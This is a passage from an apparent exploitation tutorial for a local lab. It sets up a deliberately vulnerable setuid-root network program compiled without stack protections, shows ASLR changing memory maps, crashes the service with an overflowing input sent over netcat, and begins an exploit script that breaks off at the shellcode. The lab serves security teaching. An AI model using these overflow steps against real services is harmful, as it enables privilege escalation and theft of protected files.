number is equal to code58623/code, the contents of a different file (codetoken/code) is sent to the client./p h3The Fix/h3 pThe fix is the same as in part 3. The vulnerable code is the call to strncpy on line 102./p h2Setting Up The Environment/h2 pThe environment is going to be exactly the same as in part 3, except we have a new file and ASLR will be enabled./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"[email protected]:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"[email protected]:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"[email protected]:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spancat secret.txt /span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanspan class="nb"echo/span span class="s2"quot;084934-3492048234728-4847847quot;/span gt; token/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l token /span span class="code-line"span class="go"-rw-r--r-- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod span class="m"600/span token /span span class="code-line"span class="gp"[email protected]:/home/appuser# /spancat token /span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l/span span class="code-line"span class="go"total 20/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat token/span span class="code-line"span class="go"cat: token: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pThe big difference here is that we did not change the content of the file code/proc/sys/kernel/randomize_va_space/code, if the value of this wasn't 2, then run the following command to change it: codeecho 2 gt; /proc/sys/kernel/randomize_va_space/code/p pThis means that ASLR will be enabled. We can prove this by looking at the memory map of a process over multiple executions:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"0838a000-083ab000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74e9000-b7528000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7528000-b7646000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7646000-b7647000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7647000-b77a4000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a4000-b77a5000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a5000-b77a7000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a7000-b77a8000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a8000-b77ab000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77b7000-b77b8000 r--p 00000000 08:01 961741 /usr/lib/locale/[email protected]/LC_NUMERIC/span/span span class="code-line"span class="go"b77b8000-b77b9000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77b9000-b77ba000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77ba000-b77bb000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77bb000-b77bc000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77bd000-b77be000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77be000-b77bf000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77bf000-b77c0000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77c0000-b77c7000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77c7000-b77c8000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77c8000-b77ca000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ca000-b77cb000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77cb000-b77e7000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e7000-b77e8000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e8000-b77e9000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfa32000-bfa53000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08dd9000-08dfa000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74de000-b751d000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b751d000-b763b000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b763b000-b763c000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b763c000-b7799000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b7799000-b779a000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779a000-b779c000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779c000-b779d000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779d000-b77a0000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ac000-b77ad000 r--p 00000000 08:01 961741 /usr/lib/locale/[email protected]/LC_NUMERIC/span/span span class="code-line"span class="go"b77ad000-b77ae000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77ae000-b77af000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77af000-b77b0000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77b0000-b77b1000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77b1000-b77b2000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77b2000-b77b3000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77b3000-b77b4000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77b4000-b77b5000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77b5000-b77bc000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77bd000-b77bf000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77bf000-b77c0000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77c0000-b77dc000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dc000-b77dd000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dd000-b77de000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfad4000-bfaf5000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"09908000-09929000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b7435000-b7474000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7474000-b7592000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7592000-b7593000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7593000-b76f0000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f0000-b76f1000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f1000-b76f3000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f3000-b76f4000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f4000-b76f7000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7703000-b7704000 r--p 00000000 08:01 961741 /usr/lib/locale/[email protected]/LC_NUMERIC/span/span span class="code-line"span class="go"b7704000-b7705000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b7705000-b7706000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b7706000-b7707000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b7707000-b7708000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b7708000-b7709000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b7709000-b770a000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b770a000-b770b000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b770b000-b770c000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b770c000-b7713000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b7713000-b7714000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b7714000-b7716000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7716000-b7717000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b7717000-b7733000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7733000-b7734000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7734000-b7735000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfc79000-bfc9a000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"/code/pre/div /td/tr/table pThis command displays the memory ranges of each memory segment inside the codecat/code commands own virtual memory space./p pAs you can see, all of the memory segments are changing their ranges except for the top 3. These top 3 belong to the actual code of the application./p pThis means that we can only predict memory addresses of the actual code of the application and nothing that is dynamically loaded or writable./p pEvery payload we have sent until now has been placed on the codestack/code, which is at the very bottom of the memory segment list on the output and this section of memory isn't static so we can no longer predict the address of our payload (the shellcode)./p h2Testing The App/h2 table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pWe already know a lot about this application, lets try our exploit from last time:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-net-fuzz.py /span span class="code-line"span class="go"532/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app-net /span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"26854 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"26951 pts/2 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"[email protected]:~# /spangdb -q -p span class="m"26854/span/span span class="code-line"span class="go"Attaching to process 26854/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb77c0424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbfaeb670: 0xbfae000a 0xbfaeb694 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbfaeb680: 0xbfaeba80 0xbfaeba7c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbfaeb690: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6a0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6b0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spancat app-net-exploit.py /span span class="code-line"span class="gp"#/span!/usr/bin/env python/span span class="code-line"/span span class="code-line"span class="go"import socket/span/span span class="code-line"/span span class="code-line"span class="go"shellcode = 